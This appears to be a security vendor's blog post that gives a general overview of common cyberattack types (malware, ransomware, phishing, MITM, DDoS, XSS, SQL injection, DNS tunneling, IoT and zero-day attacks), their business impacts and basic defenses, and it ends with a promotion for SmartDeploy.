A cyberattack is a deliberate attempt to access and assault computer systems, networks, or devices for malicious purposes. Like a biological virus, it only takes one tiny incursion to cause a lot of damage to many different parties in a very short time.
Taking advantage of technology and human vulnerabilities, cyberattacks are usually driven by a criminal or political agenda (or both). This can include economic gain, destruction, political espionage, or activism. The perpetrators can be individuals, organizations, or state actors acting directly or on behalf of third parties. Knowing the common types of cyberattacks and identifying any existing vulnerabilities are important first steps to planning your defenses against a potential cybersecurity threat.
What are the common types of cyberattacks?
A malware attack uses malicious software to breach, disrupt, and/or damage a computer, computer system, server, or network. It can be used to steal or destroy data or prevent access to crucial parts of an organization’s computer network. A malware attack is a broad category that may also involve the following:
- Viruses: A virus is attached to a document or file and is dormant until the file is opened and in use. Once executed, the virus replicates itself, infecting other programs and spreading throughout the host computer system.
- Worms: Unlike viruses, worms don’t need to attach themselves to a host program or require human intervention to spread. They are often transmitted via email attachments or software vulnerabilities — multiplying and spreading rapidly.
- Trojan viruses: Like its namesake, trojan viruses rely on disguise. A trojan virus is a malicious code that hides within helpful software programs. Trojan viruses don’t replicate themselves but once downloaded, will execute their intended tasks like stealing data or establishing backdoor access to corporate systems.
- Spyware: Spyware is malicious software that secretly runs on a computer or network, collecting sensitive information, like financial or personal data, and sending it back to a remote user. Spyware can also be used to grant remote access to cybercriminals.
- Adware: Adware is malicious software unknowingly downloaded on user devices, that collects user activity data, and uses it to serve up targeted advertisements. High volumes of adware can slow down your system and some can also contain trojan viruses and spyware.
- Fileless malware: Sneakier than regular malware, fileless malware leverages the software and applications in your operating system. Fileless malware is malicious code that’s hidden in a scripting language or injected into memory with a program like PowerShell, executing nefarious activities while the legitimate programs continue to run. Because fileless malware is memory-based, it is undetectable by antivirus software.
- Ransomware: Ransomware is malware that denies users access to their data and computer systems by encrypting files or locking hard drives until a ransom is paid. It’s an extortionist attack and one of the biggest cyber threats that businesses face today.
2. Double and triple extortion ransomware attacks
Conventional ransomware attacks usually involve one ransom amount in exchange for regaining access to data and/or systems that have been locked or encrypted. In a double-extortion ransomware attack, hackers demand two ransoms — one for a decryption key and one for the promise of not leaking confidential data. Triple-extortion ransomware attacks target third parties related to the primary victim, such as customers, business partners, and the media.
A phishing attack applies social engineering techniques through social media, email, and text messages to trick individuals into giving up sensitive data or confidential information. Victims could also be lured into downloading malware-infected files onto their devices. Phishing attacks include:
- Spear phishing or longlining: Spear phishing impersonates communications from a known or trusted individual such as the CEO of an organization. Or from a fabricated name with an authoritative title like Corporate Legal Administrator. This is then sent to a target group of recipients.
- Whaling: Whaling is a phishing attack that targets senior executives of an organization, luring them to perform fraudulent activities.
- Pharming: Pharming uses malicious code installed on a user’s computer to direct that user to a fake website that is made to look legitimate, in order to steal or capture user data.
4. Man-in-the-middle (MITM) attacks
MITM attacks intercept communications or data exchange between two parties, usually a user and an application or network. The aim is to steal sensitive data like personal login details or manipulate them to carry out activities like illegal funds transfers.
An example is software-as-a-service (SaaS) applications, which are often hijacked to gain access to corporate networks and confidential data. Once the dastardly deed is done, attackers may reroute traffic to phishing websites or simply allow it to reach its intended destination. This makes MITM attacks hard to detect.
5. Denial-of-service (DoS) attacks
A DoS attack is a cyberattack designed to flood systems, servers, and/or networks with false traffic to overload resources and bandwidth, disrupting business operations. Users are prevented from performing legitimate tasks like accessing email or websites.
A distributed DoS or DDoS attack is launched from multiple systems, making it faster and harder to block. DDoS attacks fall into three categories:
- Application layer attacks target specific web applications instead of the network and aim to crash the web server. Examples include HTTP GET/POST floods, low and slow attacks, and Border Gateway Protocol or BGP hijacking.
- Protocol attacks target server and firewall resources. Examples include SYN floods and Ping of Death.
- Volume-based attacks target network bandwidth, unleashing a flood of traffic packets to saturate and overload the network.
6. Cross-site scripting (XSS)
In cross-scripting attacks, malicious scripts or codes are inserted into legitimate websites without the user’s knowledge, to be executed when the site is loaded. Once infected, malicious scripts can access sensitive information or even rewrite HTML page content. Websites that allow unvalidated user-generated content such as web forums and message boards are the most vulnerable to XSS attacks.
A typical XSS attack would look like this:
- When the user loads the website, the malicious code copies the user’s cookies.
- Next, it sends an HTTP request containing the stolen cookies to the attacker’s web server.
- Using the stolen cookies, the attacker then impersonates the user or accesses the user’s personal data for fraudulent purposes.
7. SQL injections
Like XSS attacks, SQL injections also inject malicious server query language (SQL) code into data-driven applications to access sensitive information. The key difference is that XSS attacks target other users of the same application while SQL injections target the application’s database.
Leveraging system vulnerabilities, hackers use SQL injections to manipulate backend databases or servers for access to confidential data such as customer lists. They may then steal, modify, or delete that data as part of their diabolical mission. SQL injections are reportedly among the most common types of cyberattacks on gamers and the gaming industry.
8. DNS tunneling
DNS tunneling attacks interfere with DNS queries and responses protocols, bypassing traditional security measures like firewalls to penetrate and infect the server or network. Command-and-control messages or small amounts of data are incrementally encoded into DNS queries and responses, creating a covert backchannel to gain unfettered access to the target system. Hackers are then free to extract data or deliver additional payloads of malware.
It’s difficult to detect suspicious DNS traffic because of the noise, but there are two ways to do so:
- Payload analysis focuses on the information received by the DNS server. Anything unusual like odd hostnames may be a sign of foul play.
- Traffic analysis looks at the volume of DNS domain requests compared to a normal DNS exchange. Any sudden spikes may indicate malicious activity.
9. Password attack
A password attack refers to any attempt to steal a user’s password, using it to obtain access to confidential data and systems for further exploitation. Password attacks can come in many forms — phishing, malware, or a classic brute-force attack where hackers use a program to submit all possible password combinations and variants to try and crack a password. Many users struggle with creating strong passwords, making password attacks an attractive choice for cybercriminals. For companies, a leaked password or compromised credentials in the wrong hands can have severe consequences, as seen in the Colonial Pipeline incident.
10. Internet of Things (IoT) attacks
In an IoT environment, multiple different devices are connected to a network where real-time data is collected and analyzed for actionable insights. In IoT attacks, attackers can simply target one point of entry to gain access to the other connected devices on the network. Examples of common IoT cyberattacks are IoT botnets, DDoS attacks, DNS poisoning, ransomware, and data breaches.
The scale and complexity of IoT architecture result in higher levels of cybersecurity risk and vulnerabilities yet 43% of businesses don’t protect their full IoT suite. Challenges include hardware diversity, a lack of integrated security, difficulties in patching and updates, insecure protocols, and device mismanagement or misconfiguration.
11. Zero-day exploits
Zero-day exploits target a software or system vulnerability before the developer can patch or fix it. Vulnerabilities can take any form and can be exploited as long as they exist. In this scenario, there is a small window of time where there’s a security gap with no existing solution, presenting a golden opportunity for hackers to launch a cyberattack.
What are the impacts of cyberattacks on businesses?
Cyberattacks can be multipronged and involve more than one type of attack. The impact of an attack depends on the severity of the cyber threat and the security and resilience of the target organization. With every kind of cyberattack, there are tangible and intangible consequences.
An organization that has been hit by ransomware may pay the ransom to regain access to its data and systems, or to prevent hackers from releasing confidential information to the public. If important data has been leaked, resulting in litigation and public relations crises, companies may be forced to hire lawyers and other experts to handle the aftermath. Preventing future attacks would also likely require additional funds to shore up the necessary technology and expertise.
One of the primary objectives of cyberattacks is to cause as much disruption in the shortest time possible. An organization with its systems infected, firewalls breached, and data encrypted and rendered inaccessible, is unable to function. In such situations, the lost revenue can be significant and snowball quickly.
Damage to reputation and customer relationships
Reputational damage may be hard to quantify but it’s hard to fix and can have long-term implications that organizations may or may not fully recover from. With the loss of trust and credibility, customers and partners may take their business elsewhere rather than risk a poor recovery or a repeat incident.
Loss of intellectual property
The theft of intellectual property like product designs and patents, proprietary research or technology, and business strategies often results in losses that cannot be recovered. Stolen intellectual property may fall into the hands of competitors or unethical third parties, who may use it for their own gain, resulting in the loss of revenue and competitive advantage.
How do you defend your organization against cyberattacks?
Build a strong security foundation
Organizations can enhance their cybersecurity hygiene by actively building a strong security-minded culture. Ensuring that employees understand the importance of IT security and the role that they play can help to reduces human vulnerabilities, making it much harder for cyberattacks to succeed.
Cultivate and empower your cybersecurity experts
Enhance the skills and knowledge of software development and DevOps teams, so that they’re prepared and know how to prevent different types of cyberattacks. Adopt best practices in application security and work with the team to develop a clear course of action in the event of a cyberattack.
Secure your endpoint environment
Many cyberattack victims agree that their data breach could have been prevented with an available patch. An endpoint management solution like SmartDeploy allows you to efficiently manage and patch software installed on user endpoints, keeping them up to date and secure. Also, back up all important data and invest in antimalware programs and antivirus software to stay ahead of potential cyber threats.
For more good stuff, watch our guided demo and learn how SmartDeploy can be easily used to deploy applications and patches, drivers, and Windows images in independent layers. And it doesn’t matter if your environment is onsite, remote, or a hybrid mix of both because SmartDeploy allows you to deploy in all three scenarios. Download a free trial and give it a try for yourself!